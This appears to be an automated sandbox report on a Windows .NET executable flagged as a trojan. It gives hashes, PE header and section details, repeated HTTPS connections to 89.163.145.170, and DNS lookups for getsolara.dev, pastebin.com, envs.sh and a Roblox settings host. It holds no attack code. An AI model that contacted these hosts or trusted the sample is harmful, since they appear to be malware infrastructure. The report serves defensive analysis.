                                            Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.9964618702622134
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File size:1'010'176 bytes
                                            MD5:7afabb528ce69e3a40dec6c3253ef854
                                            SHA1:5161cc329e2fdda24218898bf637bb47a29daea2
                                            SHA256:130b8c87664cf95a9fee611a0c14098a4da51f6b768260ad40a7d28ff895aaf0
                                            SHA512:7eae4d625dfa0313eb3e4c73e5306d0d49d84bc30cfd6d5be41797d315926d7427ac2733206e6263e72c687193ad21737e649cba0fe79bad1798d93c1f18fe5f
                                            SSDEEP:24576:W70v2bR+kpZKDxCUGhJqBAJzJi6adwBih5u5eQp0U:Z2bR+k+VK42z0XwIKp0U
                                            TLSH:29252310028802C3D57A7EB730AE776EC69BD119B9EF0D97F3A917B3063557B8A016D2
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F!.f.................`..........~~... ........@.. ....................................@................................
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x4f7e7e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66E72146 [Sun Sep 15 18:02:46 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf7e2c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf8000 | 0x4ce | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf5e84 | 0xf6000 | fc12603564eda3f35e416db8fa213c5e | False | 0.9380250015879065 | data | 7.998024903988678 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf8000 | 0x4ce | 0x600 | d1bb5ddcae2985391dfb14e9099788c0 | False | 0.3743489583333333 | data | 3.7194301486493373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfa000 | 0xc | 0x200 | a8c352392b962b89a6d310ddf9f9e069 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xf80a0 | 0x244 | data | | | 0.4706896551724138
RT_MANIFEST | 0xf82e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Sep 16, 2024 12:22:52.642859936 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:53.264830112 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:53.265551090 CEST49761443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:53.265571117 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:53.266444921 CEST49761443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:53.266453028 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:53.522586107 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:53.522660971 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:53.522803068 CEST49761443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:53.523164034 CEST49761443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:53.523164034 CEST49761443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:53.523194075 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:53.523207903 CEST4434976189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:54.729829073 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:54.729871035 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:54.729942083 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:54.730534077 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:54.730549097 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:55.351984024 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:55.352907896 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:55.352922916 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:55.353666067 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:55.353672981 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:55.609446049 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:55.609515905 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:55.609595060 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:55.609930992 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:55.609945059 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:55.609963894 CEST49762443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:55.609968901 CEST4434976289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:56.735512972 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:56.735558987 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:56.735640049 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:56.735784054 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:56.735793114 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:57.367954969 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:57.368434906 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:57.368447065 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:57.369184017 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:57.369189978 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:57.628643990 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:57.628705978 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:57.628774881 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:57.629472017 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:57.629492998 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:57.629530907 CEST49763443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:57.629538059 CEST4434976389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:58.820679903 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:58.820739031 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:58.820821047 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:58.820966959 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:58.820995092 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:59.555695057 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:59.556431055 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:59.556451082 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:59.557182074 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:59.557193995 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:59.817446947 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:59.817507982 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:59.817574024 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:59.817989111 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:59.818015099 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:22:59.818038940 CEST49764443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:22:59.818053961 CEST4434976489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.033159018 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.033198118 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.033288956 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.033490896 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.033503056 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.651741982 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.652282000 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.652309895 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.653146982 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.653156042 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.908324957 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.908385992 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.908607006 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.908909082 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.908932924 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:03.908947945 CEST49765443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:03.908956051 CEST4434976589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:06.423160076 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:06.423207998 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:06.423326015 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:06.423470020 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:06.423487902 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:07.052336931 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:07.052758932 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:07.052772999 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:07.053405046 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:07.053411007 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:07.312895060 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:07.312958002 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:07.313056946 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:07.313744068 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:07.313760996 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:07.313807964 CEST49766443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:07.313815117 CEST4434976689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:10.454354048 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:10.454452038 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:10.454622984 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:10.454772949 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:10.454806089 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.178112984 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.178807974 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.178886890 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.179599047 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.179614067 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.437993050 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.438066959 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.438148022 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.438632965 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.438672066 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:11.438688993 CEST49767443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:11.438704014 CEST4434976789.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:13.493233919 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:13.493283987 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:13.493376017 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:13.493526936 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:13.493542910 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.116096020 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.117897987 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.117933035 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.119107008 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.119113922 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374258995 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374321938 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374375105 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.374835014 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.374855995 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:14.374869108 CEST49768443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:14.374874115 CEST4434976889.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:16.539326906 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:16.539438009 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:16.539525986 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:16.539701939 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:16.539737940 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.182655096 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.184565067 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.184628963 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.191162109 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.191175938 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.444603920 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.444678068 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.444755077 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.445174932 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.445203066 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:17.445213079 CEST49770443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:17.445220947 CEST4434977089.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:19.556683064 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:19.556747913 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:19.556827068 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:19.556977987 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:19.557005882 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.254081964 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.296432972 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.412409067 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.412437916 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.493438005 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.493467093 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.670073032 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.670152903 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.670216084 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.682053089 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.682080984 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:20.682089090 CEST49771443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:20.682096004 CEST4434977189.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:22.754255056 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:22.754329920 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:22.754558086 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:22.754811049 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:22.754849911 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.367235899 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.367764950 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.367841005 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.368294954 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.368314028 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.624389887 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.624480963 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.624574900 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.625205994 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.625205994 CEST49772443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:23.625245094 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:23.625271082 CEST4434977289.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:25.798193932 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:25.798257113 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:25.798347950 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:25.798579931 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:25.798604965 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.436533928 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.437022924 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.437051058 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.438087940 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.438093901 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.697998047 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.698084116 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.698148012 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.698529005 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.698529005 CEST49773443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:26.698553085 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:26.698561907 CEST4434977389.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:28.814292908 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:28.814333916 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:28.814445972 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:28.814677954 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:28.814702034 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.453011990 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.453510046 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.453525066 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.454332113 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.454336882 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.715936899 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.716011047 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.716196060 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.716999054 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.716999054 CEST49774443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:29.717016935 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:29.717026949 CEST4434977489.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:32.845005035 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:32.845071077 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:32.845166922 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:32.845415115 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:32.845436096 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.461244106 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.461735010 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.461775064 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.462388992 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.462397099 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716103077 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716260910 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716320038 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.716614008 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.716629982 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:33.716641903 CEST49775443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:33.716650009 CEST4434977589.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:36.860688925 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:36.860738993 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:36.860930920 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:36.861130953 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:36.861143112 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.485217094 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.485790014 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:37.485814095 CEST4434977689.163.145.170192.168.2.4
                                            Sep 16, 2024 12:23:37.486848116 CEST49776443192.168.2.489.163.145.170
                                            Sep 16, 2024 12:23:37.486855984 CEST4434977689.163.145.170192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 16, 2024 12:22:23.275859118 CEST | 192.168.2.4 | 1.1.1.1 | 0x4411 | Standard query (0) | getsolara.dev | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:27.094228983 CEST | 192.168.2.4 | 1.1.1.1 | 0x504a | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:27.934755087 CEST | 192.168.2.4 | 1.1.1.1 | 0x4753 | Standard query (0) | envs.sh | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:28.006108046 CEST | 192.168.2.4 | 1.1.1.1 | 0xd4f7 | Standard query (0) | clientsettings.roblox.com | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:30.835216045 CEST | 192.168.2.4 | 1.1.1.1 | 0x26e1 | Standard query (0) | www.nodejs.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 16, 2024 12:22:23.283305883 CEST | 1.1.1.1 | 192.168.2.4 | 0x4411 | No error (0) | getsolara.dev | | 104.21.93.27 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:23.283305883 CEST | 1.1.1.1 | 192.168.2.4 | 0x4411 | No error (0) | getsolara.dev | | 172.67.203.125 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:27.981240034 CEST | 1.1.1.1 | 192.168.2.4 | 0x4753 | No error (0) | envs.sh | | 89.163.145.170 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | clientsettings.roblox.com | titanium.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
